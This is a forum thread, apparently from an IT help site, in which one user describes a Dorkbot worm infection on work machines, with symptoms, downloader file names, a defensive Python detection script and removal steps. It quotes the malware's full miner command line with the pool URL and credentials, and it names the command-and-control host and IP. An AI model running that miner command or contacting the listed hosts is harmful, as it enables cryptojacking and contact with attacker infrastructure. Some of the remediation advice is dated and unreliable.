DrZogg (Programmer)
7 Feb 12 22:27
FYI
Not a question, more notes and tips / observations on win32\dorkbot!lnk. We have a few sites with this, it is a botnet worm that propagates over drives, then creates downloaders that contain the payloads. The payloads do not show up as viruses and have names like 3.exe, 20.exe, 1CB.exe and increment on reboot.

Command line for TCP IP is: miner.exe -a 60 -g yes -o http://xxxvideos.sso9523.com:8332/ -u p0rnstar_worker -p ornelia

Signs you have this are:
* Cannot perform automatic updates
* MS Security Essentials run time protection is off & command line calls to it fail also
* HDD folders disappear and are replaced with links (clicking these links invokes the virus; the actual folders are hidden)
* Screen flashes once when a removable drive is connected (files copied to drive etc.)
* IERTUTIL.dll is often missing and makes it impossible to boot up the OS. A copy of this can be found in c:\windows\system32\dllcache
Copy this to the system32 dir

Downloader files are created in VBA language and stored in %appdata%. File names are 3.exe, 4.exe and increment on each bootup. The programmers are from China and the downloader exe connects to xvm-170-142.ghst.net and is resolved to an IP 95.142.174.64 hosted in Paris. Because the virus creates
The programs are written in China and the hosted connection they connect to are hosted in Paris.  

3.exe and its friends do not show as risks in AV software. Only the original BOTs show up as risks.
To date re-imaging has been the only safe way to repair.

Does anyone have any notes on handling this? I believe there is a function on shutdown that recreates the exes (downloader files)

Any notes, appreciated if you add them here. I have copies of the downloaders and will run them in VM and grab the handle and window names
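Two of the signs listed above can be checked from a directory listing: the hex-counter downloader names in %appdata% (3.exe, 20.exe, 1CB.exe, B.exe) and folders on a drive that have been hidden and shadowed by a same-named .lnk. The following is an added example written for this thread, not code from the poster; the sample listings are constructed, and the live scan assumes the Windows hidden attribute is available via os.stat.

```python
import os
import re
import stat

# Downloader names seen in the thread are short hex counters: 3.exe, 20.exe, 1CB.exe, B.exe
HEX_EXE = re.compile(r"^[0-9A-F]{1,4}\.exe$", re.IGNORECASE)
# FILE_ATTRIBUTE_HIDDEN is 0x2 on Windows; the fallback keeps the module importable elsewhere
HIDDEN = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)


def suspicious_downloaders(names):
    """Return the names in an %APPDATA% listing that match the hex-counter downloader pattern."""
    return sorted(n for n in names if HEX_EXE.match(n))


def shadowed_folders(entries):
    """entries: iterable of (name, is_dir, is_hidden).

    A folder counts as shadowed when it is hidden AND a visible <name>.lnk sits beside it,
    which is the layout the worm leaves on a propagated drive."""
    hidden_dirs = {name for name, is_dir, hidden in entries if is_dir and hidden}
    lnk_stems = {name[:-4] for name, is_dir, hidden in entries
                 if not is_dir and not hidden and name.lower().endswith(".lnk")}
    return sorted(hidden_dirs & lnk_stems)


def list_entries(root):
    """Build (name, is_dir, is_hidden) tuples for one real directory (hidden bit is Windows-only)."""
    out = []
    for entry in os.scandir(root):
        attrs = getattr(entry.stat(follow_symlinks=False), "st_file_attributes", 0)
        out.append((entry.name, entry.is_dir(follow_symlinks=False), bool(attrs & HIDDEN)))
    return out


# Constructed sample data standing in for %APPDATA% and the root of a removable drive
SAMPLE_APPDATA = ["3.exe", "20.exe", "1CB.exe", "B.exe", "notepad.exe", "update.exe"]
SAMPLE_DRIVE = [("Photos", True, True), ("Photos.lnk", False, False),
                ("Docs", True, False), ("Docs.lnk", False, False),
                ("readme.txt", False, False)]

if __name__ == "__main__":
    print("downloader-like exes:", suspicious_downloaders(SAMPLE_APPDATA))
    print("shadowed folders:", shadowed_folders(SAMPLE_DRIVE))
    # On an infected host, run against the live paths instead, e.g.:
    # shadowed_folders(list_entries("E:\\"))
```

To check a real drive, feed list_entries(path) to shadowed_folders and os.listdir(os.environ["APPDATA"]) to suspicious_downloaders; "Docs" in the sample is not flagged because the real folder is still visible.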
DrZogg (Programmer)
8 Feb 12 4:41
It is compiled locally at the path C:\WINDOWS\system32\msvbvm60.dll by passing the string C:\WINDOWS\system32\msvbvm60.dll\3, then the command VBRUN, USER32.dll to build the 3.exe.

The OS kernel base named object is: BitMiner-btc.miner.03
BaseNamedObjects are created at bootup, and can exist in the 0 session.
There is a huge collection of base named objects. The solution will be to delete these objects in wsh I think
DrZogg (Programmer)
9 Feb 12 2:55
No need to write script. Steps to remove were:

1. Reinstall IE8 by running the exe or connecting to MS updates in a non-Microsoft browser; you will be prompted to download / install IE
2. If needed, reinstall MS Security Essentials
3. Perform automatic updates.

Keep doing these updates until all the updates are completed and done.

Remember to check Task Manager and ensure no instances of the downloader are running after any reboots (3.exe, 20.exe, B.exe etc.). Remember to delete them from %appdata%

The IE installer loads in clean / original DLLs, removes the BaseNamedObjects and includes malicious file removal toolkit.